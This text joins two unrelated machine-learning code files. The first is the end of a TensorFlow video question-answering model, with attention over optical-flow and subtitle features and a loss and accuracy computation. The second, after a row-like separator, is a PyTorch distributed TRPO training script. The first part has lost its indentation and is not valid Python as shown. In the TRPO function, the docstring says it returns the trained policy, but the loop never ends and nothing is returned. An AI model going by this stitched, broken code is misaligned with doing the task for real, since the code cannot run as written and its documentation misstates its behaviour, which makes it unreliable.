flow_answer0_mul = tf.matmul(flow_logits, tf.transpose(answer0_flow, perm=[0, 2, 1]))
flow_answer1_mul = tf.matmul(flow_logits, tf.transpose(answer1_flow, perm=[0, 2, 1]))
flow_answer2_mul = tf.matmul(flow_logits, tf.transpose(answer2_flow, perm=[0, 2, 1]))
flow_answer3_mul = tf.matmul(flow_logits, tf.transpose(answer3_flow, perm=[0, 2, 1]))
flow_answer4_mul = tf.matmul(flow_logits, tf.transpose(answer4_flow, perm=[0, 2, 1]))
# flow_answer0_mul = tf.matmul(tf.transpose(answer0_d, [0, 2, 1]), flow_logits)
# flow_answer1_mul = tf.matmul(tf.transpose(answer1_d, [0, 2, 1]), flow_logits)
# flow_answer2_mul = tf.matmul(tf.transpose(answer2_d, [0, 2, 1]), flow_logits)
# flow_answer3_mul = tf.matmul(tf.transpose(answer3_d, [0, 2, 1]), flow_logits)
# flow_answer4_mul = tf.matmul(tf.transpose(answer4_d, [0, 2, 1]), flow_logits)
flow_answer0_similarity = tf.nn.softmax(flow_answer0_mul)
flow_answer1_similarity = tf.nn.softmax(flow_answer1_mul)
flow_answer2_similarity = tf.nn.softmax(flow_answer2_mul)
flow_answer3_similarity = tf.nn.softmax(flow_answer3_mul)
flow_answer4_similarity = tf.nn.softmax(flow_answer4_mul)
flow_answer0_masked = tf.matmul(flow_answer0_similarity, answer0_flow)
flow_answer1_masked = tf.matmul(flow_answer1_similarity, answer1_flow)
flow_answer2_masked = tf.matmul(flow_answer2_similarity, answer2_flow)
flow_answer3_masked = tf.matmul(flow_answer3_similarity, answer3_flow)
flow_answer4_masked = tf.matmul(flow_answer4_similarity, answer4_flow)
# flow_answer0_mask = tf.matmul(flow_answer0_similarity, tf.transpose(flow_logits, perm=[0, 2, 1]))
# flow_answer1_mask = tf.matmul(flow_answer1_similarity, tf.transpose(flow_logits, perm=[0, 2, 1]))
# flow_answer2_mask = tf.matmul(flow_answer2_similarity, tf.transpose(flow_logits, perm=[0, 2, 1]))
# flow_answer3_mask = tf.matmul(flow_answer3_similarity, tf.transpose(flow_logits, perm=[0, 2, 1]))
# flow_answer4_mask = tf.matmul(flow_answer4_similarity, tf.transpose(flow_logits, perm=[0, 2, 1]))
# flow_answer0_mask = tf.squeeze(flow_answer0_mask, axis=2)
# flow_answer1_mask = tf.squeeze(flow_answer1_mask, axis=2)
# flow_answer2_mask = tf.squeeze(flow_answer2_mask, axis=2)
# flow_answer3_mask = tf.squeeze(flow_answer3_mask, axis=2)
# flow_answer4_mask = tf.squeeze(flow_answer4_mask, axis=2)
with tf.variable_scope("Flow_train_question_answer_att_layer", reuse=tf.AUTO_REUSE):
flow_question_answer0_att = tf.concat([flow_logits, flow_question_masked, flow_answer0_masked,
tf.multiply(flow_logits, flow_question_masked),
tf.multiply(flow_logits, flow_answer0_masked)], axis=2)
flow_question_answer1_att = tf.concat([flow_logits, flow_question_masked, flow_answer1_masked,
tf.multiply(flow_logits, flow_question_masked),
tf.multiply(flow_logits, flow_answer1_masked)], axis=2)
flow_question_answer2_att = tf.concat([flow_logits, flow_question_masked, flow_answer2_masked,
tf.multiply(flow_logits, flow_question_masked),
tf.multiply(flow_logits, flow_answer2_masked)], axis=2)
flow_question_answer3_att = tf.concat([flow_logits, flow_question_masked, flow_answer3_masked,
tf.multiply(flow_logits, flow_question_masked),
tf.multiply(flow_logits, flow_answer3_masked)], axis=2)
flow_question_answer4_att = tf.concat([flow_logits, flow_question_masked, flow_answer4_masked,
tf.multiply(flow_logits, flow_question_masked),
tf.multiply(flow_logits, flow_answer4_masked)], axis=2)
#flow_rnn_model = video_rnn.vRNN('LSTM', 1000, 'Flow')
#flow_question_answer0_att = flow_rnn_model.build(flow_question_answer0_att, prob, flow_seq_len)
#flow_question_answer1_att = flow_rnn_model.build(flow_question_answer1_att, prob, flow_seq_len)
#flow_question_answer2_att = flow_rnn_model.build(flow_question_answer2_att, prob, flow_seq_len)
#flow_question_answer3_att = flow_rnn_model.build(flow_question_answer3_att, prob, flow_seq_len)
#flow_question_answer4_att = flow_rnn_model.build(flow_question_answer4_att, prob, flow_seq_len)
#flow_question_answer0_att = tf.reduce_max(flow_question_answer0_att, 1)
#flow_question_answer1_att = tf.reduce_max(flow_question_answer1_att, 1)
#flow_question_answer2_att = tf.reduce_max(flow_question_answer2_att, 1)
#flow_question_answer3_att = tf.reduce_max(flow_question_answer3_att, 1)
#flow_question_answer4_att = tf.reduce_max(flow_question_answer4_att, 1)
# flow_question_answer0_att = tf.concat([flow_question_masked, flow_answer0_mask], axis=1)
# flow_question_answer1_att = tf.concat([flow_question_masked, flow_answer1_mask], axis=1)
# flow_question_answer2_att = tf.concat([flow_question_masked, flow_answer2_mask], axis=1)
# flow_question_answer3_att = tf.concat([flow_question_masked, flow_answer3_mask], axis=1)
# flow_question_answer4_att = tf.concat([flow_question_masked, flow_answer4_mask], axis=1)
# flow_question_answer0_att = tf.matmul(flow_question_masked, tf.transpose(flow_answer0_mask, perm=[0, 2, 1]))
# flow_question_answer1_att = tf.matmul(flow_question_masked, tf.transpose(flow_answer1_mask, perm=[0, 2, 1]))
# flow_question_answer2_att = tf.matmul(flow_question_masked, tf.transpose(flow_answer2_mask, perm=[0, 2, 1]))
# flow_question_answer3_att = tf.matmul(flow_question_masked, tf.transpose(flow_answer3_mask, perm=[0, 2, 1]))
# flow_question_answer4_att = tf.matmul(flow_question_masked, tf.transpose(flow_answer4_mask, perm=[0, 2, 1]))
'''
flow_question_answer0_cnn = tf.layers.conv1d(flow_question_answer0_att, 1, 1, padding='same',
activation=tf.nn.leaky_relu, kernel_regularizer=regularizer,
kernel_initializer=tf.initializers.random_normal, name="flow_conv")
flow_question_answer1_cnn = tf.layers.conv1d(flow_question_answer1_att, 1, 1, padding='same',
activation=tf.nn.leaky_relu, kernel_regularizer=regularizer,
name="flow_conv", reuse=True)
flow_question_answer2_cnn = tf.layers.conv1d(flow_question_answer2_att, 1, 1, padding='same',
activation=tf.nn.leaky_relu, kernel_regularizer=regularizer,
name="flow_conv", reuse=True)
flow_question_answer3_cnn = tf.layers.conv1d(flow_question_answer3_att, 1, 1, padding='same',
activation=tf.nn.leaky_relu, kernel_regularizer=regularizer,
name="flow_conv", reuse=True)
flow_question_answer4_cnn = tf.layers.conv1d(flow_question_answer4_att, 1, 1, padding='same',
activation=tf.nn.leaky_relu, kernel_regularizer=regularizer,
name="flow_conv", reuse=True)
flow_question_answer0_cnn = tf.nn.dropout(flow_question_answer0_cnn, prob[0][0])
flow_question_answer1_cnn = tf.nn.dropout(flow_question_answer1_cnn, prob[0][0])
flow_question_answer2_cnn = tf.nn.dropout(flow_question_answer2_cnn, prob[0][0])
flow_question_answer3_cnn = tf.nn.dropout(flow_question_answer3_cnn, prob[0][0])
flow_question_answer4_cnn = tf.nn.dropout(flow_question_answer4_cnn, prob[0][0])
flow_question_answer0_cnn = tf.squeeze(flow_question_answer0_cnn, 2)
flow_question_answer1_cnn = tf.squeeze(flow_question_answer1_cnn, 2)
flow_question_answer2_cnn = tf.squeeze(flow_question_answer2_cnn, 2)
flow_question_answer3_cnn = tf.squeeze(flow_question_answer3_cnn, 2)
flow_question_answer4_cnn = tf.squeeze(flow_question_answer4_cnn, 2)
'''
'''
flow_question_answer0_fc = tf.layers.dense(flow_question_answer0_att, 2000, activation=tf.nn.leaky_relu,
kernel_regularizer=regularizer, name="Flow_mask_fc")
flow_question_answer1_fc = tf.layers.dense(flow_question_answer1_att, 2000, activation=tf.nn.leaky_relu,
kernel_regularizer=regularizer, name="Flow_mask_fc", reuse=True)
flow_question_answer2_fc = tf.layers.dense(flow_question_answer2_att, 2000, activation=tf.nn.leaky_relu,
kernel_regularizer=regularizer, name="Flow_mask_fc", reuse=True)
flow_question_answer3_fc = tf.layers.dense(flow_question_answer3_att, 2000, activation=tf.nn.leaky_relu,
kernel_regularizer=regularizer, name="Flow_mask_fc", reuse=True)
flow_question_answer4_fc = tf.layers.dense(flow_question_answer4_att, 2000, activation=tf.nn.leaky_relu,
kernel_regularizer=regularizer, name="Flow_mask_fc", reuse=True)
flow_question_answer0_fc = tf.nn.dropout(flow_question_answer0_fc, keep_prob=prob[0][0])
flow_question_answer1_fc = tf.nn.dropout(flow_question_answer1_fc, keep_prob=prob[0][0])
flow_question_answer2_fc = tf.nn.dropout(flow_question_answer2_fc, keep_prob=prob[0][0])
flow_question_answer3_fc = tf.nn.dropout(flow_question_answer3_fc, keep_prob=prob[0][0])
flow_question_answer4_fc = tf.nn.dropout(flow_question_answer4_fc, keep_prob=prob[0][0])
'''
#flow_question_answer0_fc = tf.reduce_max(flow_question_answer0_att, 1)
#flow_question_answer1_fc = tf.reduce_max(flow_question_answer1_att, 1)
#flow_question_answer2_fc = tf.reduce_max(flow_question_answer2_att, 1)
#flow_question_answer3_fc = tf.reduce_max(flow_question_answer3_att, 1)
#flow_question_answer4_fc = tf.reduce_max(flow_question_answer4_att, 1)
# flow_question_answer0_fc = tf.squeeze(flow_question_answer0_fc, 2)
# flow_question_answer1_fc = tf.squeeze(flow_question_answer1_fc, 2)
# flow_question_answer2_fc = tf.squeeze(flow_question_answer2_fc, 2)
# flow_question_answer3_fc = tf.squeeze(flow_question_answer3_fc, 2)
# flow_question_answer4_fc = tf.squeeze(flow_question_answer4_fc, 2)
with tf.variable_scope("video_fc", reuse=tf.AUTO_REUSE):
# rgb_answer0_g_logits = tf.layers.dense(rgb_question_answer0_fc, 1, name="RGB_fc",
# kernel_regularizer=regularizer, activation=tf.nn.leaky_relu)
# rgb_answer1_g_logits = tf.layers.dense(rgb_question_answer1_fc, 1, name="RGB_fc",
# kernel_regularizer=regularizer, activation=tf.nn.leaky_relu, reuse=True)
# rgb_answer2_g_logits = tf.layers.dense(rgb_question_answer2_fc, 1, name="RGB_fc",
# kernel_regularizer=regularizer, activation=tf.nn.leaky_relu, reuse=True)
# rgb_answer3_g_logits = tf.layers.dense(rgb_question_answer3_fc, 1, name="RGB_fc",
# kernel_regularizer=regularizer, activation=tf.nn.leaky_relu, reuse=True)
# rgb_answer4_g_logits = tf.layers.dense(rgb_question_answer4_fc, 1, name="RGB_fc",
# kernel_regularizer=regularizer, activation=tf.nn.leaky_relu, reuse=True)
# rgb_answer0_g_logits = tf.nn.dropout(rgb_answer0_g_logits, prob[0][0])
# rgb_answer1_g_logits = tf.nn.dropout(rgb_answer1_g_logits, prob[0][0])
# rgb_answer2_g_logits = tf.nn.dropout(rgb_answer2_g_logits, prob[0][0])
# rgb_answer3_g_logits = tf.nn.dropout(rgb_answer3_g_logits, prob[0][0])
# rgb_answer4_g_logits = tf.nn.dropout(rgb_answer4_g_logits, prob[0][0])
flow_answer0_g_logits = tf.layers.dense(flow_question_answer0_att, 1, name="Flow_fc",
kernel_regularizer=regularizer, activation=tf.nn.leaky_relu)
flow_answer1_g_logits = tf.layers.dense(flow_question_answer1_att, 1, name="Flow_fc",
kernel_regularizer=regularizer, activation=tf.nn.leaky_relu, reuse=True)
flow_answer2_g_logits = tf.layers.dense(flow_question_answer2_att, 1, name="Flow_fc",
kernel_regularizer=regularizer, activation=tf.nn.leaky_relu, reuse=True)
flow_answer3_g_logits = tf.layers.dense(flow_question_answer3_att, 1, name="Flow_fc",
kernel_regularizer=regularizer, activation=tf.nn.leaky_relu, reuse=True)
flow_answer4_g_logits = tf.layers.dense(flow_question_answer4_att, 1, name="Flow_fc",
kernel_regularizer=regularizer, activation=tf.nn.leaky_relu, reuse=True)
flow_answer0_g_logits = tf.nn.dropout(flow_answer0_g_logits, prob[0][0])
flow_answer1_g_logits = tf.nn.dropout(flow_answer1_g_logits, prob[0][0])
flow_answer2_g_logits = tf.nn.dropout(flow_answer2_g_logits, prob[0][0])
flow_answer3_g_logits = tf.nn.dropout(flow_answer3_g_logits, prob[0][0])
flow_answer4_g_logits = tf.nn.dropout(flow_answer4_g_logits, prob[0][0])
flow_answer0_g_logits = tf.layers.batch_normalization(flow_answer0_g_logits, training=is_training[0][0])
flow_answer1_g_logits = tf.layers.batch_normalization(flow_answer1_g_logits, training=is_training[0][0])
flow_answer2_g_logits = tf.layers.batch_normalization(flow_answer2_g_logits, training=is_training[0][0])
flow_answer3_g_logits = tf.layers.batch_normalization(flow_answer3_g_logits, training=is_training[0][0])
flow_answer4_g_logits = tf.layers.batch_normalization(flow_answer4_g_logits, training=is_training[0][0])
flow_answer0_g_logits = tf.reduce_max(flow_answer0_g_logits, 1)
flow_answer1_g_logits = tf.reduce_max(flow_answer1_g_logits, 1)
flow_answer2_g_logits = tf.reduce_max(flow_answer2_g_logits, 1)
flow_answer3_g_logits = tf.reduce_max(flow_answer3_g_logits, 1)
flow_answer4_g_logits = tf.reduce_max(flow_answer4_g_logits, 1)
with tf.variable_scope("post_rnn", reuse=tf.AUTO_REUSE):
# subtitle_question_g_rnn_model = text_rnn_cudnn.tRNN("LSTM", FLAGS.num_hidden, "subtitle_question_g")
subtitle_answer_g_rnn_model = text_rnn_cudnn.tRNN("LSTM", FLAGS.num_hidden * 5, "subtitle_answer_g")
# subtitle_question_g_rnn_logits = subtitle_question_g_rnn_model.build(subtitle_question_g,
# is_training=FLAGS.is_training,
# seq_len=sub_seq_len)
subtitle_answer0_g_rnn_logits = subtitle_answer_g_rnn_model.build(concat_subtitle_query0,
dropout_keep_prob=text_prob,
seq_len=sub_seq_len)
subtitle_answer1_g_rnn_logits = subtitle_answer_g_rnn_model.build(concat_subtitle_query1,
dropout_keep_prob=text_prob,
seq_len=sub_seq_len)
subtitle_answer2_g_rnn_logits = subtitle_answer_g_rnn_model.build(concat_subtitle_query2,
dropout_keep_prob=text_prob,
seq_len=sub_seq_len)
subtitle_answer3_g_rnn_logits = subtitle_answer_g_rnn_model.build(concat_subtitle_query3,
dropout_keep_prob=text_prob,
seq_len=sub_seq_len)
subtitle_answer4_g_rnn_logits = subtitle_answer_g_rnn_model.build(concat_subtitle_query4,
dropout_keep_prob=text_prob,
seq_len=sub_seq_len)
# subtitle_question_g_rnn_logits = tf.reduce_max(subtitle_question_g_rnn_logits, axis=1)
# subtitle_question_g_logits = tf.layers.dense(subtitle_question_g_rnn_logits, 1,
# name="subtitle_question_g_logits")
subtitle_answer0_g_rnn_logits = tf.reduce_max(subtitle_answer0_g_rnn_logits, axis=1)
subtitle_answer1_g_rnn_logits = tf.reduce_max(subtitle_answer1_g_rnn_logits, axis=1)
subtitle_answer2_g_rnn_logits = tf.reduce_max(subtitle_answer2_g_rnn_logits, axis=1)
subtitle_answer3_g_rnn_logits = tf.reduce_max(subtitle_answer3_g_rnn_logits, axis=1)
subtitle_answer4_g_rnn_logits = tf.reduce_max(subtitle_answer4_g_rnn_logits, axis=1)
subtitle_answer0_g_logits = tf.layers.dense(subtitle_answer0_g_rnn_logits, 1,
name="subtitle_answer_g_logits",
activation=tf.nn.leaky_relu)
subtitle_answer1_g_logits = tf.layers.dense(subtitle_answer1_g_rnn_logits, 1,
name="subtitle_answer_g_logits", reuse=True,
activation=tf.nn.leaky_relu)
subtitle_answer2_g_logits = tf.layers.dense(subtitle_answer2_g_rnn_logits, 1,
name="subtitle_answer_g_logits", reuse=True,
activation=tf.nn.leaky_relu)
subtitle_answer3_g_logits = tf.layers.dense(subtitle_answer3_g_rnn_logits, 1,
name="subtitle_answer_g_logits", reuse=True,
activation=tf.nn.leaky_relu)
subtitle_answer4_g_logits = tf.layers.dense(subtitle_answer4_g_rnn_logits, 1,
name="subtitle_answer_g_logits", reuse=True,
activation=tf.nn.leaky_relu)
# subtitle_answer_g_concat = tf.concat([subtitle_answer0_g_rnn_logits, subtitle_answer1_g_rnn_logits,
# subtitle_answer2_g_rnn_logits, subtitle_answer3_g_rnn_logits,
# subtitle_answer4_g_rnn_logits], axis=1)
# subtitle_answer_embed = tf.layers.dense(subtitle_answer_g_concat, 5, kernel_regularizer=regularizer,
# activation=tf.nn.leaky_relu, name="text_classifier")
'''
subtitle_answer0_g_logits = tf.layers.dropout(subtitle_answer0_g_logits, training=is_training)
subtitle_answer1_g_logits = tf.layers.dropout(subtitle_answer1_g_logits, training=is_training)
subtitle_answer2_g_logits = tf.layers.dropout(subtitle_answer2_g_logits, training=is_training)
subtitle_answer3_g_logits = tf.layers.dropout(subtitle_answer3_g_logits, training=is_training)
subtitle_answer4_g_logits = tf.layers.dropout(subtitle_answer4_g_logits, training=is_training)
'''
subtitle_answer0_g_logits = tf.nn.dropout(subtitle_answer0_g_logits, text_prob[0][0])
subtitle_answer1_g_logits = tf.nn.dropout(subtitle_answer1_g_logits, text_prob[0][0])
subtitle_answer2_g_logits = tf.nn.dropout(subtitle_answer2_g_logits, text_prob[0][0])
subtitle_answer3_g_logits = tf.nn.dropout(subtitle_answer3_g_logits, text_prob[0][0])
subtitle_answer4_g_logits = tf.nn.dropout(subtitle_answer4_g_logits, text_prob[0][0])
with tf.variable_scope("Embed"):
# subtitle_question_embed = tf.concat([subtitle_question_g_logits, subtitle_question_g_logits,
# subtitle_question_g_logits, subtitle_question_g_logits,
# subtitle_question_g_logits], axis=1)
subtitle_answer_embed = tf.concat([subtitle_answer0_g_logits, subtitle_answer1_g_logits,
subtitle_answer2_g_logits, subtitle_answer3_g_logits,
subtitle_answer4_g_logits], axis=1)
subtitle_text_embed = subtitle_answer_embed
# rgb_answer_embed = tf.concat([rgb_answer0_g_logits, rgb_answer1_g_logits, rgb_answer2_g_logits,
# rgb_answer3_g_logits, rgb_answer4_g_logits], axis=1)
flow_answer_embed = tf.concat([flow_answer0_g_logits, flow_answer1_g_logits, flow_answer2_g_logits,
flow_answer3_g_logits, flow_answer4_g_logits], axis=1)
'''
with tf.variable_scope("RGB_text_embed"):
rgb_rnn_logits = tf.reshape(tf.cast(rgb_rnn_logits, tf.float64), [-1, FLAGS.num_hidden*2, 1])
rgb_question_embed_logits = tf.matmul(question_rnn_logits, rgb_rnn_logits)
rgb_question_embed_logits = tf.concat([rgb_question_embed_logits, rgb_question_embed_logits,
rgb_question_embed_logits, rgb_question_embed_logits,
rgb_question_embed_logits], axis=1)
rgb_answer_embed_logits = tf.matmul(answer_rnn_logits, rgb_rnn_logits)
rgb_text_embed = rgb_question_embed_logits + rgb_answer_embed_logits
with tf.variable_scope("flow_text_embed"):
flow_rnn_logits = tf.reshape(tf.cast(flow_rnn_logits, tf.float64), [-1, FLAGS.num_hidden*2, 1])
flow_question_embed_logits = tf.matmul(question_rnn_logits, flow_rnn_logits)
flow_question_embed_logits = tf.concat([flow_question_embed_logits, flow_question_embed_logits,
flow_question_embed_logits, flow_question_embed_logits,
flow_question_embed_logits], axis=1)
flow_answer_embed_logits = tf.matmul(answer_rnn_logits, flow_rnn_logits)
flow_text_embed = flow_question_embed_logits + flow_answer_embed_logits
'''
# with tf.device("/GPU:1"):
with tf.variable_scope("prediction"):
def loss_calc(elem):
correct = elem[0][tf.argmax(elem[1])]
# loss1 = tf.maximum(tf.cast(0.0, tf.float32), FLAGS.margin - correct + elem[0][0])
# loss2 = tf.maximum(tf.cast(0.0, tf.float32), FLAGS.margin - correct + elem[0][1])
# loss3 = tf.maximum(tf.cast(0.0, tf.float32), FLAGS.margin - correct + elem[0][2])
# loss4 = tf.maximum(tf.cast(0.0, tf.float32), FLAGS.margin - correct + elem[0][3])
# loss5 = tf.maximum(tf.cast(0.0, tf.float32), FLAGS.margin - correct + elem[0][4])
# not_loss = FLAGS.margin
loss1 = tf.exp(elem[0][0] - correct)
loss2 = tf.exp(elem[0][1] - correct)
loss3 = tf.exp(elem[0][2] - correct)
loss4 = tf.exp(elem[0][3] - correct)
loss5 = tf.exp(elem[0][4] - correct)
# return loss1 + loss2 + loss3 + loss4 + loss5 - not_loss
return tf.log(loss1 + loss2 + loss3 + loss4 + loss5)
video_logits = flow_answer_embed
total_logits = tf.nn.softmax(subtitle_text_embed, axis=1) + tf.scalar_mul(0.5,
tf.nn.softmax(video_logits, axis=1))
train_i3d_var_list = []
train_match_var_list = []
#reg_var_list = []
for v in tf.trainable_variables():
if v.name.startswith(u"Flow_train") or v.name.startswith(u"video"):
train_match_var_list.append(v)
if v.name.startswith(u"Flow") and not u"train" in v.name:
train_i3d_var_list.append(v)
#if not ('bias' in v.name) and ('bidirectional_rnn' in v.name) and "Flow" in v.name:
# reg_var_list.append(v)
# zero_tensor = tf.zeros([FLAGS.batch_size, 5], tf.int32)
# bool_mask = tf.equal(zero_tensor, a)
# margin_tensor = tf.constant(0.2, shape=[FLAGS.batch_size])
# ranking_pos = tf.gather(total_logits, tf.argmax(a, axis=1), axis=1)
# ranking_pos = tf.reduce_sum(ranking_pos, axis=1)
# ranking_neg = tf.boolean_mask(total_logits, bool_mask)
# ranking_neg = tf.reshape(ranking_neg, [-1, 4])
# ranking_neg = tf.reduce_sum(ranking_neg, axis=1)
# zero_tensor2 = tf.zeros([FLAGS.batch_size], tf.float32)
# loss = tf.map_fn(loss_calc, (total_logits, a), dtype=tf.float32)
video_loss = tf.map_fn(loss_calc, (video_logits, a), dtype=tf.float32)
# video_loss = tf.nn.softmax_cross_entropy_with_logits_v2(labels=a, logits=video_logits)
# loss = tf.maximum(zero_tensor2, margin_tensor - ranking_pos + ranking_neg)
reg_losses = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)
# cost = tf.reduce_mean(loss)
cost = tf.reduce_mean(video_loss) + tf.cast(tf.contrib.layers.apply_regularization(regularizer, reg_losses),
tf.float32)
# tf.add_to_collection('losses', cost)
# optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.lr)
# op = optimizer.minimize(cost, var_list=train_var_list)
comparison = tf.equal(tf.argmax(total_logits, axis=1), tf.argmax(a, axis=1))
video_comparison = tf.equal(tf.argmax(video_logits, axis=1), tf.argmax(a, axis=1))
accuracy = tf.reduce_mean(tf.cast(comparison, tf.float32), name="accuracy")
video_accuracy = tf.reduce_mean(tf.cast(video_comparison, tf.float32), name="accuracy")
# loss_summary = tf.summary.scalar("loss", cost)
# accuracy_summary = tf.summary.scalar("accuracy", accuracy)
# summary_op = tf.summary.merge([loss_summary, accuracy_summary])
# train_var_list = []
# for v in tf.trainable_variables():
# if v.name.startswith(u"RGB") or v.name.startswith(u"Flow"):
# train_var_list.append(v)
'''
prediction = tf.nn.softmax(total_logits, axis=1)
train_var_list = []
for v in tf.trainable_variables():
if not (v.name.startswith(u"RGB") or v.name.startswith(u"Flow")):
train_var_list.append(v)
#a = 3
#a = tf.squeeze(a, axis=[1])
#cost = tf.reduce_mean(-tf.reduce_sum(tf.cast(a, tf.float64) * tf.log(prediction), 1))
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(labels=a, logits=total_logits))
optimizer = tf.train.MomentumOptimizer(learning_rate=FLAGS.lr, momentum=0.9)
op = optimizer.minimize(cost, var_list=train_var_list)
comparison = tf.equal(tf.argmax(prediction, axis=1), tf.argmax(a, axis=1))
accuracy = tf.reduce_mean(tf.cast(comparison, tf.float64), name="accuracy")
loss_summary = tf.summary.scalar("loss", cost)
accuracy_summary = tf.summary.scalar("accuracy", accuracy)
summary_op = tf.summary.merge([loss_summary, accuracy_summary])
'''
return cost, accuracy, video_accuracy, qid, comparison, train_i3d_var_list, train_match_var_list |
19,270 | 35f3618b0f4e899536a4a6e145c2df1b28612fc9 | from itertools import count
from time import time
import gym
import scipy.optimize
from tensorboardX import SummaryWriter
from core.models import *
from torch.autograd import Variable
from torch import Tensor
import torch.tensor as tensor
# from core.agent import AgentCollection
from core.agent_ray import AgentCollection
from utils.utils import *
from core.running_state import ZFilter
# from core.common import estimate_advantages_parallel
from core.common_ray import estimate_advantages_parallel
from torch.nn.utils.convert_parameters import parameters_to_vector, vector_to_parameters
import numpy as np
from torch.distributions.kl import kl_divergence
# from core.natural_gradient import conjugate_gradient_gloabl
from core.natural_gradient_ray import conjugate_gradient_global
from core.policy_gradient import compute_policy_gradient_parallel
from core.log_determinant import compute_log_determinant
# from envs.mujoco.half_cheetah import HalfCheetahVelEnv_FL
import ray
import os
import envs
torch.utils.backcompat.broadcast_warning.enabled = True
torch.utils.backcompat.keepdim_warning.enabled = True
torch.set_default_tensor_type('torch.DoubleTensor')
def trpo(env, args):
    """Train a Gaussian policy on *env* with distributed TRPO and return it.

    Workflow per episode: sample trajectories across parallel agents,
    estimate advantages, average the per-agent policy gradients and
    value-net fits, compute a natural-gradient step via conjugate
    gradient, then backtracking line search under a KL constraint.

    Args:
        env: a Gym-style environment (Box observation and action spaces).
        args: namespace of hyperparameters (seed, hidden_size, num_layers,
            teacher_batch_size, agent_count, num_workers, gamma, tau,
            max_kl, cg_damping, cg_iter, log_interval,
            num_teacher_episodes, render).

    Returns:
        The trained policy network.
    """
    dtype = torch.double
    torch.set_default_dtype(dtype)
    # env = gym.make(args.env_name)
    num_inputs = env.observation_space.shape[0]
    num_actions = env.action_space.shape[0]
    # Seed both the environment and torch for reproducibility.
    env.seed(args.seed)
    torch.manual_seed(args.seed)
    policy_net = Policy(num_inputs, num_actions, hidden_sizes = (args.hidden_size,) * args.num_layers)
    # print("Network structure:")
    # for name, param in policy_net.named_parameters():
    #     print("name: {}, size: {}".format(name, param.size()[0]))
    # flat_param = parameters_to_vector(policy_net.parameters())
    # matrix_dim = flat_param.size()[0]
    # print("number of total parameters: {}".format(matrix_dim))
    value_net = Value(num_inputs)
    batch_size = args.teacher_batch_size
    # ZFilter normalises observations with a running mean/std, clipped at 5.
    running_state = ZFilter((env.observation_space.shape[0],), clip=5)
    agents = AgentCollection(env, policy_net, 'cpu', running_state=running_state, render=args.render,
                             num_agents=args.agent_count, num_parallel_workers=args.num_workers)
    def trpo_loss(advantages, states, actions, params, params_trpo_ls):
        # This is the negative trpo objective
        # Evaluated at candidate parameters `params_trpo_ls` relative to the
        # behaviour parameters `params`; the network is restored to `params`
        # before returning, so this is side-effect free for the caller.
        with torch.no_grad():
            set_flat_params_to(policy_net, params)
            log_prob_prev = policy_net.get_log_prob(states, actions)
            set_flat_params_to(policy_net, params_trpo_ls)
            log_prob_current = policy_net.get_log_prob(states, actions)
            # Importance-weighted surrogate: -A * pi_new/pi_old.
            negative_trpo_objs = -advantages * torch.exp(log_prob_current - log_prob_prev)
            negative_trpo_obj = negative_trpo_objs.mean()
            set_flat_params_to(policy_net, params)
        return negative_trpo_obj
    def compute_kl(states, prev_params, xnew):
        # Mean KL divergence between the policies parameterised by
        # `prev_params` and `xnew` over `states`; restores `prev_params`.
        with torch.autograd.no_grad():
            set_flat_params_to(policy_net, prev_params)
            pi = policy_net(Variable(states))
            set_flat_params_to(policy_net, xnew)
            pi_new = policy_net(Variable(states))
            set_flat_params_to(policy_net, prev_params)
            kl = torch.mean(kl_divergence(pi, pi_new))
        return kl
    for i_episode in count(1):
        losses = []
        # Sample Trajectories
        # print('Episode {}. Sampling trajectories...'.format(i_episode))
        # time_begin = time()
        memories, logs = agents.collect_samples(batch_size)
        # time_sample = time() - time_begin
        # print('Episode {}. Sampling trajectories is done, using time {}.'.format(i_episode, time_sample))
        # Process Trajectories
        # print('Episode {}. Processing trajectories...'.format(i_episode))
        # time_begin = time()
        advantages_list, returns_list, states_list, actions_list = \
            estimate_advantages_parallel(memories, value_net, args.gamma, args.tau)
        # time_process = time() - time_begin
        # print('Episode {}. Processing trajectories is done, using time {}'.format(i_episode, time_process))
        # Computing Policy Gradient
        # print('Episode {}. Computing policy gradients...'.format(i_episode))
        # time_begin = time()
        policy_gradients, value_net_update_params = compute_policy_gradient_parallel(policy_net, value_net, states_list, actions_list, returns_list, advantages_list)
        # Average the per-agent policy gradients and value-net parameter
        # vectors, then load the averaged parameters back into value_net.
        pg = np.array(policy_gradients).mean(axis=0)
        pg = torch.from_numpy(pg)
        value_net_average_params = np.array(value_net_update_params).mean(axis=0)
        value_net_average_params = torch.from_numpy(value_net_average_params)
        vector_to_parameters(value_net_average_params, value_net.parameters())
        # time_pg = time() - time_begin
        # print('Episode {}. Computing policy gradients is done, using time {}.'.format(i_episode, time_pg))
        # Computing Conjugate Gradient
        # print('Episode {}. Computing the harmonic mean of natural gradient directions...'.format(i_episode))
        fullstep = conjugate_gradient_global(policy_net, states_list, pg,
                                             args.max_kl, args.cg_damping, args.cg_iter)
        # Linear Search
        # print('Episode {}. Linear search...'.format(i_episode))
        # time_begin = time()
        prev_params = get_flat_params_from(policy_net)
        # Baseline surrogate loss at the current parameters.
        for advantages, states, actions in zip(advantages_list, states_list, actions_list):
            losses.append(trpo_loss(advantages, states, actions, prev_params, prev_params).detach().numpy())
        fval = np.array(losses).mean()
        # ls_flag = False
        # Backtracking line search: halve the step up to 10 times until the
        # surrogate loss improves AND the mean KL stays under max_kl.
        # NOTE(review): if no step is accepted, the policy is left unchanged
        # for this episode (no explicit failure handling).
        for (n_backtracks, stepfrac) in enumerate(0.5 ** np.arange(10)):
            new_losses = []
            kls = []
            xnew = prev_params + stepfrac * fullstep
            for advantages, states, actions in zip(advantages_list, states_list, actions_list):
                new_losses.append(trpo_loss(advantages, states, actions, prev_params, xnew).data)
                kls.append(compute_kl(states, prev_params, xnew).detach().numpy())
            new_loss = np.array(new_losses).mean()
            kl = np.array(kls).mean()
            # print(new_loss - fval, kl)
            if new_loss - fval < 0 and kl < args.max_kl:
                set_flat_params_to(policy_net, xnew)
                # writer.add_scalar("n_backtracks", n_backtracks, i_episode)
                ls_flag = True
                break
        # time_ls = time() - time_begin
        # if ls_flag:
        #     print('Episode {}. Linear search is done in {} steps, using time {}'
        #           .format(i_episode, n_backtracks, time_ls))
        # else:
        #     print('Episode {}. Linear search is done but failed, using time {}'
        #           .format(i_episode, time_ls))
        rewards = [log['avg_reward'] for log in logs]
        average_reward = np.array(rewards).mean()
        if i_episode % args.log_interval == 0:
            print('Episode {}. Average reward {:.2f}'.format(
                i_episode, average_reward))
